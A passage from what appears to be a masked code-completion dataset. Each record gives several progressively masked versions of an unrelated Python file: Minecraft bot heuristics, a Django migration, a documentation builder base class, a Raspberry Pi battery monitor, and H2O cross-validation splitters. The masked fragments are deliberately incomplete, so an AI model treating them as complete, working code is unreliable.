return rtn
def _mine_heuristic(bot, problem):
"""Return the mining heuristic.
bot is an _ImaginaryBot.
"""
if bot.contains(problem.get_block_id()):
return 0
bot_pos = bot.get_pos()
dest_pos = problem.get_block_loc()
# If man == dy: return man + 1
# If man > dy: return man
# If man < dy: return dy?
man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))
y_diff = bot_pos.y - dest_pos.y
if y_diff < 0:
y_diff += 1
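        # The target is above the bot; since the bot can mine the block above
        # its head, the climb is presumably one level shorter.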
if y_diff == 0:
return man_dist
# Transform so that it's only dropping
drop = _DROP if y_diff > 0 else 1
y_diff = abs(y_diff)
drops = _drops(y_diff, drop)
if man_dist > drops:
return man_dist
if man_dist == drops:
return man_dist + 1
if drop == 1:
return drops
if y_diff % drop == 1:
return drops
return drops + 1
def _drops(dist, drop):
"""Return the number of times it takes to drop a distance dist. drop is the
length of one drop. Both are assumed positive."""
rtn = dist / drop
if dist % drop != 0:
rtn += 1
return rtn
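# For example, _drops(7, 3) == 3: two full drops of 3 blocks plus a final
# drop of 1 block (the integer division is rounded up).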
def _return_heuristic(bot, problem):
"""Return the return heuristic.
bot is an _ImaginaryBot.
"""
bot_pos = bot.get_pos()
player_pos = problem.get_player_loc()
    bot_plane_pos = (bot_pos.x, bot_pos.z)
y_diff = bot_pos.y - player_pos.y
drop = _DROP if y_diff > 0 else 1
y_diff = abs(y_diff)
drops = _drops(y_diff, drop)
min_man = float('inf')
for dir_ in _adj_dirs():
loc = player_pos + 2 * dir_
man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))
if man_dist < min_man:
min_man = man_dist
    if min_man < drops:
return drops
return min_man
def _to_my_vec3(vec):
"""Return the _Vec3 alternative of the Vec3."""
return _Vec3(vec.x, vec.y, vec.z)
def _player_loc():
"""Return the player's location."""
return _to_my_vec3(_get_mc().player.getTilePos())
def _adj_dirs():
"""Return the adjacent directions."""
return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]
def _all_dirs():
"""Return all adjacent directions."""
return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]
def _manhattan(pos1, pos2):
"""Return the manhattan distance. pos1 and pos2 should be iterable."""
return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))
@singleton
def _get_mc():
"""Return the Minecraft instance."""
return minecraft.Minecraft.create()
def _key_vals(dict_):
"""Return a list of key-val tuples."""
return [(key, val) for key, val in dict_.iteritems()]
| [
48,
54,
69,
73,
79
] |
3 | 45969b346d6d5cbdef2f5d2f74270cf12024072d | <mask token>
| <mask token>
class Migration(migrations.Migration):
<mask token>
<mask token>
| <mask token>
class Migration(migrations.Migration):
dependencies = [('search', '0003_auto_20230209_1441')]
operations = [migrations.CreateModel(name='SearchSettings', fields=[(
'id', models.AutoField(auto_created=True, primary_key=True,
serialize=False, verbose_name='ID'))], options={'permissions': ((
'change_boost', 'Edit boost settings for search components'), (
'view_explore', 'View the global search explore page')), 'managed':
False, 'default_permissions': ()})]
| from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('search', '0003_auto_20230209_1441')]
operations = [migrations.CreateModel(name='SearchSettings', fields=[(
'id', models.AutoField(auto_created=True, primary_key=True,
serialize=False, verbose_name='ID'))], options={'permissions': ((
'change_boost', 'Edit boost settings for search components'), (
'view_explore', 'View the global search explore page')), 'managed':
False, 'default_permissions': ()})]
| # Generated by Django 4.1.9 on 2023-06-29 16:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("search", "0003_auto_20230209_1441"),
]
operations = [
migrations.CreateModel(
name="SearchSettings",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
],
options={
"permissions": (
("change_boost", "Edit boost settings for search components"),
("view_explore", "View the global search explore page"),
),
"managed": False,
"default_permissions": (),
},
),
]
| [
0,
1,
2,
3,
4
] |
4 | 3fbf1768a2fe78df591c49490dfce5fb374e7fc2 | from functools import wraps
import os
def restoring_chdir(fn):
#XXX:dc: This would be better off in a neutral module
@wraps(fn)
def decorator(*args, **kw):
        path = os.getcwd()
        try:
            return fn(*args, **kw)
finally:
os.chdir(path)
return decorator
class BaseBuilder(object):
"""
The Base for all Builders. Defines the API for subclasses.
    All workflow steps need to return True; otherwise it is assumed something
    went wrong and the Builder will stop.
"""
workflow = ['clean', 'build', 'move']
def __init__(self, version):
self.version = version
def run(self):
for step in self.workflow:
fn = getattr(self, step)
result = fn()
assert result
@restoring_chdir
def force(self):
"""
An optional step to force a build even when nothing has changed.
"""
print "Forcing a build by touching files"
os.chdir(self.version.project.conf_dir(self.version.slug))
os.system('touch * && touch */*')
def clean(self):
"""
Clean up the version so it's ready for usage.
This is used to add RTD specific stuff to Sphinx, and to
implement whitelists on projects as well.
It is guaranteed to be called before your project is built.
"""
raise NotImplementedError
def build(self):
"""
Do the actual building of the documentation.
"""
raise NotImplementedError
def move(self):
"""
Move the documentation from it's generated place to its final home.
This needs to understand both a single server dev environment,
as well as a multi-server environment.
"""
raise NotImplementedError
@property
def changed(self):
"""
Says whether the documentation has changed, and requires further action.
This is mainly used to short-circuit more expensive builds of other
output formats if the project docs didn't change on an update.
Subclasses are recommended to override for more efficient builds.
Defaults to `True`
"""
return True
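# A minimal sketch of a concrete builder (hypothetical names, for
# illustration only): every workflow step returns True on success so that
# ``run`` can assert on it.
class ExampleBuilder(BaseBuilder):
    def clean(self):
        return True  # e.g. wipe stale output for self.version
    def build(self):
        return os.system('echo building %s' % self.version) == 0
    def move(self):
        return True  # e.g. copy the generated docs to their final home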
| null | null | null | null | [
0
] |
5 | 67b967b688aeac1270eee836e0f6e6b3555b933e | <mask token>
| <mask token>
if u_avg < u_bat_min:
print('proper shut down of the machine due to low battery')
else:
    print('all is well, sleep soundly, good people')
| <mask token>
pidcmes = Pidcmes()
u_bat_min = 3.7
n_moy = 20
stop_run = False
u_avg = pidcmes.get_tension(n_moy)
if u_avg < u_bat_min:
print('proper shut down of the machine due to low battery')
else:
    print('all is well, sleep soundly, good people')
| <mask token>
import time
import datetime as dt
from subprocess import call
from pidcmes_lib import Pidcmes
pidcmes = Pidcmes()
u_bat_min = 3.7
n_moy = 20
stop_run = False
u_avg = pidcmes.get_tension(n_moy)
if u_avg < u_bat_min:
print('proper shut down of the machine due to low battery')
else:
    print('all is well, sleep soundly, good people')
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This program is run at regular intervals to check the battery charge status of the uninterruptible power supply.
In our case, it is a LiPo battery with a nominal voltage of 3.7 volts. By setting the voltage for the
Raspberry PI shutdown procedure at 3.7 V, we ensure that the processor has enough time to make a clean shutdown.
This program must be launched at regular intervals (every 5 minutes in our case) by the Raspberry PI OS cron task scheduler.
The crontab -e command opens the cron file; the entry for a trigger every 5 minutes would for example be:
*/5 * * * * sudo /usr/bin/python3 /home/pi/dev_python/amod/pidcmes_bbu.py
"""
import time
import datetime as dt
from subprocess import call
from pidcmes_lib import Pidcmes # class for 'pidcmes' procedures
pidcmes = Pidcmes() # initialize pidcmese class
u_bat_min = 3.7 # minumum battery voltage
n_moy = 20 # averaging to reduce glitches
stop_run = False # to control the execution (run/stop)
u_avg = pidcmes.get_tension(n_moy) # read the value in volts
if u_avg < u_bat_min:# or i > 10:
print("proper shut down of the machine due to low battery")
# time.sleep(5)
# call("sudo shutdown -h now", shell=True) # shutdown the RASPI
else:
    print("all is well, sleep soundly, good people")
| [
0,
1,
2,
3,
4
] |
6 | c59707ba07c1659d94684c54cdd7bb2658cba935 | <mask token>
class H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):
<mask token>
<mask token>
def split(self, frame, y=None):
"""Generate indices to split data into training and test.
Parameters
----------
frame : ``H2OFrame``
The h2o frame to split
y : str, optional (default=None)
The name of the column to stratify, if applicable.
Returns
-------
train : ndarray
The training set indices for the split
test : ndarray
The testing set indices for that split
"""
frame = check_frame(frame, copy=False)
indices = np.arange(frame.shape[0])
for test_index in self._iter_test_masks(frame, y):
train_index = indices[np.logical_not(test_index)]
test_index = indices[test_index]
yield list(train_index), list(test_index)
<mask token>
def _iter_test_indices(self, frame, y=None):
raise NotImplementedError(
'this method must be implemented by a subclass')
<mask token>
def __repr__(self):
return _build_repr(self)
<mask token>
class H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):
"""Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This
is used for ``h2o_train_test_split`` in strategic train/test splits of
H2OFrames. Implementing subclasses should override ``_iter_indices``.
Parameters
----------
n_splits : int, optional (default=2)
The number of folds or splits in the split
test_size : float or int, optional (default=0.1)
The ratio of observations for the test fold
train_size : float or int, optional (default=None)
The ratio of observations for the train fold
random_state : int or RandomState, optional (default=None)
The random state for duplicative purposes.
"""
def __init__(self, n_splits=2, test_size=0.1, train_size=None,
random_state=None):
_validate_shuffle_split_init(test_size, train_size)
self.n_splits = n_splits
self.test_size = test_size
self.train_size = train_size
self.random_state = random_state
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
for train, test in self._iter_indices(frame, y):
yield train, test
@abstractmethod
def _iter_indices(self, frame, y):
"""Abstract method for iterating the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
pass
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the shuffle split.
"""
return self.n_splits
def __repr__(self):
return _build_repr(self)
class H2OShuffleSplit(H2OBaseShuffleSplit):
"""Default shuffle splitter used for ``h2o_train_test_split``.
This shuffle split class will not perform any stratification, and
will simply shuffle indices and split into the number of specified
sub-frames.
"""
def _iter_indices(self, frame, y=None):
"""Iterate the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify. Since this class does
not perform stratification, ``y`` is unused.
Returns
-------
ind_train : np.ndarray, shape=(n_samples,)
The train indices
ind_test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
rng = check_random_state(self.random_state)
for i in range(self.n_splits):
permutation = rng.permutation(n_samples)
ind_test = permutation[:n_test]
ind_train = permutation[n_test:n_test + n_train]
yield ind_train, ind_test
class H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):
"""Shuffle splitter used for ``h2o_train_test_split`` when stratified
option is specified. This shuffle split class will perform stratification.
"""
def _iter_indices(self, frame, y):
"""Iterate the indices with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
Returns
-------
train : np.ndarray, shape=(n_samples,)
The train indices
test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
y = _val_y(y)
target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()
)
classes, y_indices = np.unique(target, return_inverse=True)
n_classes = classes.shape[0]
class_counts = bincount(y_indices)
if np.min(class_counts) < 2:
raise ValueError(
'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'
)
if n_train < n_classes:
raise ValueError(
'The train_size=%d should be greater than or equal to the number of classes=%d'
% (n_train, n_classes))
if n_test < n_classes:
raise ValueError(
'The test_size=%d should be greater than or equal to the number of classes=%d'
% (n_test, n_classes))
rng = check_random_state(self.random_state)
p_i = class_counts / float(n_samples)
n_i = np.round(n_train * p_i).astype(int)
t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)
)
for _ in range(self.n_splits):
train = []
test = []
for i, class_i in enumerate(classes):
permutation = rng.permutation(class_counts[i])
perm_indices_class_i = np.where(target == class_i)[0][
permutation]
train.extend(perm_indices_class_i[:n_i[i]])
test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])
if len(train) + len(test) < n_train + n_test:
missing_indices = np.where(bincount(train + test, minlength
=len(target)) == 0)[0]
missing_indices = rng.permutation(missing_indices)
n_missing_train = n_train - len(train)
n_missing_test = n_test - len(test)
if n_missing_train > 0:
train.extend(missing_indices[:n_missing_train])
if n_missing_test > 0:
test.extend(missing_indices[-n_missing_test:])
train = rng.permutation(train)
test = rng.permutation(test)
yield train, test
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedShuffleSplit, self).split(frame, y)
class _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):
"""Base class for KFold and Stratified KFold.
Parameters
----------
n_folds : int
The number of splits
shuffle : bool
Whether to shuffle indices
random_state : int or RandomState
The random state for the split
"""
@abstractmethod
def __init__(self, n_folds, shuffle, random_state):
if not isinstance(n_folds, numbers.Integral):
raise ValueError(
'n_folds must be of Integral type. %s of type %s was passed' %
(n_folds, type(n_folds)))
n_folds = int(n_folds)
if n_folds <= 1:
raise ValueError(
'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'
)
if shuffle not in [True, False]:
raise TypeError(
'shuffle must be True or False. Got %s (type=%s)' % (str(
shuffle), type(shuffle)))
self.n_folds = n_folds
self.shuffle = shuffle
self.random_state = random_state
@overrides(H2OBaseCrossValidator)
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
frame = check_frame(frame, copy=False)
n_obs = frame.shape[0]
if self.n_folds > n_obs:
raise ValueError('Cannot have n_folds greater than n_obs')
for train, test in super(_H2OBaseKFold, self).split(frame, y):
yield train, test
@overrides(H2OBaseCrossValidator)
def get_n_splits(self):
"""Get the number of splits or folds.
Returns
-------
n_folds : int
The number of folds
"""
return self.n_folds
class H2OKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OKFold, self).__init__(n_folds, shuffle, random_state)
@overrides(_H2OBaseKFold)
def _iter_test_indices(self, frame, y=None):
n_obs = frame.shape[0]
indices = np.arange(n_obs)
if self.shuffle:
check_random_state(self.random_state).shuffle(indices)
n_folds = self.n_folds
fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)
fold_sizes[:n_obs % n_folds] += 1
current = 0
for fold_size in fold_sizes:
start, stop = current, current + fold_size
yield indices[start:stop]
current = stop
class H2OStratifiedKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame with
stratified splits.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state
)
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedKFold, self).split(frame, y)
def _iter_test_masks(self, frame, y):
test_folds = self._make_test_folds(frame, y)
for i in range(self.n_folds):
yield test_folds == i
def _make_test_folds(self, frame, y):
if self.shuffle:
rng = check_random_state(self.random_state)
else:
rng = self.random_state
y = _val_y(y)
if y is None:
raise ValueError(
'H2OStratifiedKFold requires a target name (got None)')
target = frame[y].as_data_frame(use_pandas=True)[y].values
n_samples = target.shape[0]
unique_y, y_inversed = np.unique(target, return_inverse=True)
y_counts = bincount(y_inversed)
min_labels = np.min(y_counts)
if np.all(self.n_folds > y_counts):
raise ValueError(
'All the n_labels for individual classes are less than %d folds.'
% self.n_folds, Warning)
if self.n_folds > min_labels:
warnings.warn(
'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'
% (min_labels, self.n_folds), Warning)
if SK18:
per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,
random_state=rng).split(np.zeros(max(count, self.n_folds))) for
count in y_counts]
else:
per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,
shuffle=self.shuffle, random_state=rng) for count in y_counts]
test_folds = np.zeros(n_samples, dtype=np.int)
for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):
for cls, (_, test_split) in zip(unique_y, per_cls_splits):
cls_test_folds = test_folds[target == cls]
test_split = test_split[test_split < len(cls_test_folds)]
cls_test_folds[test_split] = test_fold_indices
test_folds[target == cls] = cls_test_folds
return test_folds
| <mask token>
class H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):
<mask token>
<mask token>
def split(self, frame, y=None):
"""Generate indices to split data into training and test.
Parameters
----------
frame : ``H2OFrame``
The h2o frame to split
y : str, optional (default=None)
The name of the column to stratify, if applicable.
Returns
-------
train : ndarray
The training set indices for the split
test : ndarray
The testing set indices for that split
"""
frame = check_frame(frame, copy=False)
indices = np.arange(frame.shape[0])
for test_index in self._iter_test_masks(frame, y):
train_index = indices[np.logical_not(test_index)]
test_index = indices[test_index]
yield list(train_index), list(test_index)
def _iter_test_masks(self, frame, y=None):
"""Generates boolean masks corresponding to the tests set.
Parameters
----------
frame : H2OFrame
The h2o frame to split
y : string, optional (default=None)
The column to stratify.
Returns
-------
test_mask : np.ndarray, shape=(n_samples,)
The indices for the test split
"""
for test_index in self._iter_test_indices(frame, y):
test_mask = np.zeros(frame.shape[0], dtype=np.bool)
test_mask[test_index] = True
yield test_mask
def _iter_test_indices(self, frame, y=None):
raise NotImplementedError(
'this method must be implemented by a subclass')
@abstractmethod
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the cross validator.
"""
pass
def __repr__(self):
return _build_repr(self)
<mask token>
class H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):
"""Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This
is used for ``h2o_train_test_split`` in strategic train/test splits of
H2OFrames. Implementing subclasses should override ``_iter_indices``.
Parameters
----------
n_splits : int, optional (default=2)
The number of folds or splits in the split
test_size : float or int, optional (default=0.1)
The ratio of observations for the test fold
train_size : float or int, optional (default=None)
The ratio of observations for the train fold
random_state : int or RandomState, optional (default=None)
The random state for duplicative purposes.
"""
def __init__(self, n_splits=2, test_size=0.1, train_size=None,
random_state=None):
_validate_shuffle_split_init(test_size, train_size)
self.n_splits = n_splits
self.test_size = test_size
self.train_size = train_size
self.random_state = random_state
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
for train, test in self._iter_indices(frame, y):
yield train, test
@abstractmethod
def _iter_indices(self, frame, y):
"""Abstract method for iterating the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
pass
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the shuffle split.
"""
return self.n_splits
def __repr__(self):
return _build_repr(self)
class H2OShuffleSplit(H2OBaseShuffleSplit):
"""Default shuffle splitter used for ``h2o_train_test_split``.
This shuffle split class will not perform any stratification, and
will simply shuffle indices and split into the number of specified
sub-frames.
"""
def _iter_indices(self, frame, y=None):
"""Iterate the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify. Since this class does
not perform stratification, ``y`` is unused.
Returns
-------
ind_train : np.ndarray, shape=(n_samples,)
The train indices
ind_test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
rng = check_random_state(self.random_state)
for i in range(self.n_splits):
permutation = rng.permutation(n_samples)
ind_test = permutation[:n_test]
ind_train = permutation[n_test:n_test + n_train]
yield ind_train, ind_test
class H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):
"""Shuffle splitter used for ``h2o_train_test_split`` when stratified
option is specified. This shuffle split class will perform stratification.
"""
def _iter_indices(self, frame, y):
"""Iterate the indices with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
Returns
-------
train : np.ndarray, shape=(n_samples,)
The train indices
test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
y = _val_y(y)
target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()
)
classes, y_indices = np.unique(target, return_inverse=True)
n_classes = classes.shape[0]
class_counts = bincount(y_indices)
if np.min(class_counts) < 2:
raise ValueError(
'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'
)
if n_train < n_classes:
raise ValueError(
'The train_size=%d should be greater than or equal to the number of classes=%d'
% (n_train, n_classes))
if n_test < n_classes:
raise ValueError(
'The test_size=%d should be greater than or equal to the number of classes=%d'
% (n_test, n_classes))
rng = check_random_state(self.random_state)
p_i = class_counts / float(n_samples)
n_i = np.round(n_train * p_i).astype(int)
t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)
)
for _ in range(self.n_splits):
train = []
test = []
for i, class_i in enumerate(classes):
permutation = rng.permutation(class_counts[i])
perm_indices_class_i = np.where(target == class_i)[0][
permutation]
train.extend(perm_indices_class_i[:n_i[i]])
test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])
if len(train) + len(test) < n_train + n_test:
missing_indices = np.where(bincount(train + test, minlength
=len(target)) == 0)[0]
missing_indices = rng.permutation(missing_indices)
n_missing_train = n_train - len(train)
n_missing_test = n_test - len(test)
if n_missing_train > 0:
train.extend(missing_indices[:n_missing_train])
if n_missing_test > 0:
test.extend(missing_indices[-n_missing_test:])
train = rng.permutation(train)
test = rng.permutation(test)
yield train, test
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedShuffleSplit, self).split(frame, y)
class _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):
"""Base class for KFold and Stratified KFold.
Parameters
----------
n_folds : int
The number of splits
shuffle : bool
Whether to shuffle indices
random_state : int or RandomState
The random state for the split
"""
@abstractmethod
def __init__(self, n_folds, shuffle, random_state):
if not isinstance(n_folds, numbers.Integral):
raise ValueError(
'n_folds must be of Integral type. %s of type %s was passed' %
(n_folds, type(n_folds)))
n_folds = int(n_folds)
if n_folds <= 1:
raise ValueError(
'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'
)
if shuffle not in [True, False]:
raise TypeError(
'shuffle must be True or False. Got %s (type=%s)' % (str(
shuffle), type(shuffle)))
self.n_folds = n_folds
self.shuffle = shuffle
self.random_state = random_state
@overrides(H2OBaseCrossValidator)
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
frame = check_frame(frame, copy=False)
n_obs = frame.shape[0]
if self.n_folds > n_obs:
raise ValueError('Cannot have n_folds greater than n_obs')
for train, test in super(_H2OBaseKFold, self).split(frame, y):
yield train, test
@overrides(H2OBaseCrossValidator)
def get_n_splits(self):
"""Get the number of splits or folds.
Returns
-------
n_folds : int
The number of folds
"""
return self.n_folds
class H2OKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OKFold, self).__init__(n_folds, shuffle, random_state)
@overrides(_H2OBaseKFold)
def _iter_test_indices(self, frame, y=None):
n_obs = frame.shape[0]
indices = np.arange(n_obs)
if self.shuffle:
check_random_state(self.random_state).shuffle(indices)
n_folds = self.n_folds
fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)
fold_sizes[:n_obs % n_folds] += 1
current = 0
for fold_size in fold_sizes:
start, stop = current, current + fold_size
yield indices[start:stop]
current = stop
class H2OStratifiedKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame with
stratified splits.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state
)
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedKFold, self).split(frame, y)
def _iter_test_masks(self, frame, y):
test_folds = self._make_test_folds(frame, y)
for i in range(self.n_folds):
yield test_folds == i
def _make_test_folds(self, frame, y):
if self.shuffle:
rng = check_random_state(self.random_state)
else:
rng = self.random_state
y = _val_y(y)
if y is None:
raise ValueError(
'H2OStratifiedKFold requires a target name (got None)')
target = frame[y].as_data_frame(use_pandas=True)[y].values
n_samples = target.shape[0]
unique_y, y_inversed = np.unique(target, return_inverse=True)
y_counts = bincount(y_inversed)
min_labels = np.min(y_counts)
if np.all(self.n_folds > y_counts):
raise ValueError(
'All the n_labels for individual classes are less than %d folds.'
% self.n_folds, Warning)
if self.n_folds > min_labels:
warnings.warn(
'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'
% (min_labels, self.n_folds), Warning)
if SK18:
per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,
random_state=rng).split(np.zeros(max(count, self.n_folds))) for
count in y_counts]
else:
per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,
shuffle=self.shuffle, random_state=rng) for count in y_counts]
test_folds = np.zeros(n_samples, dtype=np.int)
for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):
for cls, (_, test_split) in zip(unique_y, per_cls_splits):
cls_test_folds = test_folds[target == cls]
test_split = test_split[test_split < len(cls_test_folds)]
cls_test_folds[test_split] = test_fold_indices
test_folds[target == cls] = cls_test_folds
return test_folds
| <mask token>
class H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):
<mask token>
def __init__(self):
pass
def split(self, frame, y=None):
"""Generate indices to split data into training and test.
Parameters
----------
frame : ``H2OFrame``
The h2o frame to split
y : str, optional (default=None)
The name of the column to stratify, if applicable.
Returns
-------
train : ndarray
The training set indices for the split
test : ndarray
The testing set indices for that split
"""
frame = check_frame(frame, copy=False)
indices = np.arange(frame.shape[0])
for test_index in self._iter_test_masks(frame, y):
train_index = indices[np.logical_not(test_index)]
test_index = indices[test_index]
yield list(train_index), list(test_index)
def _iter_test_masks(self, frame, y=None):
"""Generates boolean masks corresponding to the tests set.
Parameters
----------
frame : H2OFrame
The h2o frame to split
y : string, optional (default=None)
The column to stratify.
Returns
-------
test_mask : np.ndarray, shape=(n_samples,)
The indices for the test split
"""
for test_index in self._iter_test_indices(frame, y):
test_mask = np.zeros(frame.shape[0], dtype=np.bool)
test_mask[test_index] = True
yield test_mask
def _iter_test_indices(self, frame, y=None):
raise NotImplementedError(
'this method must be implemented by a subclass')
@abstractmethod
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the cross validator.
"""
pass
def __repr__(self):
return _build_repr(self)
<mask token>
class H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):
"""Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This
is used for ``h2o_train_test_split`` in strategic train/test splits of
H2OFrames. Implementing subclasses should override ``_iter_indices``.
Parameters
----------
n_splits : int, optional (default=2)
The number of folds or splits in the split
test_size : float or int, optional (default=0.1)
The ratio of observations for the test fold
train_size : float or int, optional (default=None)
The ratio of observations for the train fold
random_state : int or RandomState, optional (default=None)
The random state for duplicative purposes.
"""
def __init__(self, n_splits=2, test_size=0.1, train_size=None,
random_state=None):
_validate_shuffle_split_init(test_size, train_size)
self.n_splits = n_splits
self.test_size = test_size
self.train_size = train_size
self.random_state = random_state
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
for train, test in self._iter_indices(frame, y):
yield train, test
@abstractmethod
def _iter_indices(self, frame, y):
"""Abstract method for iterating the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
pass
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the shuffle split.
"""
return self.n_splits
def __repr__(self):
return _build_repr(self)
class H2OShuffleSplit(H2OBaseShuffleSplit):
"""Default shuffle splitter used for ``h2o_train_test_split``.
This shuffle split class will not perform any stratification, and
will simply shuffle indices and split into the number of specified
sub-frames.
"""
def _iter_indices(self, frame, y=None):
"""Iterate the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify. Since this class does
not perform stratification, ``y`` is unused.
Returns
-------
ind_train : np.ndarray, shape=(n_samples,)
The train indices
ind_test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
rng = check_random_state(self.random_state)
for i in range(self.n_splits):
permutation = rng.permutation(n_samples)
ind_test = permutation[:n_test]
ind_train = permutation[n_test:n_test + n_train]
yield ind_train, ind_test
class H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):
"""Shuffle splitter used for ``h2o_train_test_split`` when stratified
option is specified. This shuffle split class will perform stratification.
"""
def _iter_indices(self, frame, y):
"""Iterate the indices with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
Returns
-------
train : np.ndarray, shape=(n_samples,)
The train indices
test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
